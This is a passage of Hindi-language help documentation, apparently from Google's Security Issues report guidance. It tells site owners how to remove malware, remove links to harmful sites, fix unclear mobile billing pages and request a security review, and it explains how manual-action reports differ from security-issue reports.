अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक की गई सामग्री को दोबारा ठीक करने के लिए बनाई गई गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे सुरक्षित रखने के सुझाव बताए गए हैं. अपनी साइट से मैलवेयर निकालने के लिए, आप मैलवेयर वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप उनकी जगह बैकअप के तौर पर पहले सेव की गईं बिना मैलवेयर वाली फ़ाइलें इस्तेमाल कर सकते हैं या फिर मौजूदा फ़ाइलों से स्पैम वाली सामग्री हटा सकते हैं. अपनी साइट पर होस्ट की जा रहीं बाइनरी फ़ाइल और दूसरी सामग्री को स्कैन करने के लिए एंटीवायरस सॉफ़्टवेयर इस्तेमाल करें. एंटीवायरस सॉफ़्टवेयर कई तरह के मैलवेयर और अनचाहे सॉफ़्टवेयर का पता लगा सकता है, लेकिन इससे हर तरह के मैलवेयर का पता नहीं लगाया जा सकता. किसी एंटीवायरस प्रोग्राम (या सभी तरह के वायरस की जानकारी इकट्ठा करने वाली सेवा, जैसे VirusTotal) से अपने सॉफ़्टवेयर की जाँच करें. इस प्रोग्राम या सेवा से आपको पता चलेगा कि आपके सॉफ़्टवेयर में क्या समस्याएं हो सकती हैं. Google सुरक्षित ब्राउज़िंग की सुविधा में तय की गई शर्तों के मुताबिक यह जाँच की जाती है कि कोई प्रोग्राम या बाइनरी फ़ाइल अनचाहा सॉफ़्टवेयर या मैलवेयर है या नहीं.

5. समस्याओं को ठीक करने के बाद उनकी पुष्टि करना

ध्यान रखें कि आपकी साइट अनचाहे सॉफ़्टवेयर की नीति के मुताबिक सही हो.

6. समीक्षा के लिए अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

नुकसान पहुंचाने वाली साइटों के लिंक

आपकी साइट पर ऐसी साइटों के लिंक मौजूद हो सकते हैं जिनमें Google सुरक्षित ब्राउज़िंग के मुताबिक मैलवेयर या अनचाहे सॉफ़्टवेयर हों. उपयोगकर्ता के आपकी साइट पर आने पर, Chrome ब्राउज़र चेतावनी दिखा सकता है. आपको चेतावनी हटाने के लिए, अपनी साइट से ऐसी साइटों के लिंक हटाने होंगे.

1. समस्या का आकलन करना

अगर ये लिंक जानबूझकर शामिल किए गए हैं, तो इन्हें अपनी साइट से हटा दें और सीधे समीक्षा के लिए अनुरोध करें पर जाएं.

अगर आपको इन लिंक के बारे में जानकारी नहीं है, तो हो सकता है कि आपकी साइट हैक कर ली गई हो.

2. समस्या को ठीक करने का तरीका

अगर आपकी साइट को हैक कर लिया गया है, तो स्पैम की समस्या को खुद ठीक करने की जानकारी पाने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

3. समस्या की पुष्टि करना

 

असामान्य रूप से डाउनलोड होने वाली फ़ाइलों की पुष्टि करने के लिए, अपनी साइट के कुछ पेजों की अच्छी तरह जाँच कर लें. कुछ मामलों में, अगर हैकर को पता चल जाता है कि आप साइट के मालिक हैं, तो वह ये लिंक छिपा सकता है. इसलिए, यूआरएल की जाँच करने वाले टूल की मदद से नमूना यूआरएल पर जाएं या किसी दूसरे खाते या कंप्यूटर से लॉग इन करें.

4. अपनी साइट से मैलवेयर निकालना

अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक की गई सामग्री को दोबारा ठीक करने के लिए बनाई गई गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे सुरक्षित रखने के सुझाव बताए गए हैं. अपनी साइट से मैलवेयर निकालने के लिए, आप मैलवेयर वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप उनकी जगह बैकअप के तौर पर पहले सेव की गईं बिना मैलवेयर वाली फ़ाइलें इस्तेमाल कर सकते हैं या फिर मौजूदा फ़ाइलों से स्पैम वाली सामग्री हटा सकते हैं.

5. समस्याओं को ठीक करने के बाद उनकी पुष्टि करना

ध्यान रखें कि आपकी साइट अनचाहे सॉफ़्टवेयर की नीति के मुताबिक सही हो.

6. समीक्षा के लिए अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

मोबाइल पर खुलने वाले ऐसे पेज, जिनमें शुल्क की नीतियों के बारे में साफ़ तौर पर नहीं बताया जाता

अगर Google को पता चलता है कि आपकी साइट में मोबाइल पर खुलने वाले ऐसे पेज हैं जिनमें शुल्क की नीतियों के बारे में उपयोगकर्ताओं को पूरी जानकारी नहीं दी जाती, तो Chrome पर इसके बारे में चेतावनी दिखाई जा सकती है. यह चेतावनी शुल्क लेने वाले पेज के लोड होने से पहले दिखाई जाती है.

1. समस्या की पुष्टि करना

यह जानने के लिए कि किन पेजों में इस शुल्क के बारे में अधूरी जानकारी दी गई है, रिपोर्ट में उदाहरण के तौर पर दिए गए यूआरएल देखें. यहां मोबाइल पर खुलने वाले पेज पर उपलब्ध शुल्क की नीतियों के बारे में दिशा-निर्देश पढ़ें.

2. समस्या ठीक करना

अपने पेजों की समस्या हल करें, ताकि उन पर दी जाने वाली शुल्क की जानकारी दिशा-निर्देशों के मुताबिक हो.

3. समीक्षा के लिए अनुरोध करें

जब आप यह पुष्टि कर देते हैं कि आपकी साइट की समस्या को ठीक कर लिया गया है, तो सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

मैन्युअल तरीके से की गईं कार्रवाइयों की रिपोर्ट और सुरक्षा की समस्याओं वाली रिपोर्ट में क्या फ़र्क है?

मैन्युअल तरीके से की गईं कार्रवाइयों की रिपोर्ट किसी ऐसे पेज या साइट में समस्याओं की सूची बनाती है जो ज़्यादातर हमारे खोज के इंडेक्स में हेर-फ़ेर करने की कोशिश करती हैं, लेकिन उपयोगकर्ताओं के लिए खतरनाक हों ऐसा ज़रूरी नहीं है. यहां बताई गईं ज़्यादातर समस्याएं ऐसी हैं, जिनकी वजह से खोज नतीजों में पेज या साइट नीचे दिखने लगेंगे या उन्हें खोज नतीजों से हटा दिया जाएगा. उपयोगकर्ता को इसका कोई संकेत नहीं मिलेगा.

सुरक्षा समस्याओं की रिपोर्ट ऐसे संकेतों की सूची बनाती है जिससे पता लगे कि आपकी साइट हैक कर ली गई थी या आपकी साइट पर ऐसा व्यवहार था जो वेबसाइट पर आने वाले व्यक्ति या उनके कंप्यूटर को संभावित रूप से नुकसान पहुंचा सकता है. उदाहरण के लिए, फ़िशिंग आक्रमण या उपयोगकर्ता के कंप्यूटर पर मैलवेयर या अनचाहा सॉफ़्टवेयर इंस्टॉल करना. खोज नतीजों में इन पेजों के साथ चेतावनी का लेबल दिखाई दे सकता है या जब कोई उपयोगकर्ता इन पेजों पर जाने की कोशिश करेगा, तब पेज खुलने से पहले उसे ब्राउज़र पर चेतावनी वाला पेज दिख सकता है.

क्या यह उपयोगी था?
हम उसे किस तरह बेहतर बना सकते हैं?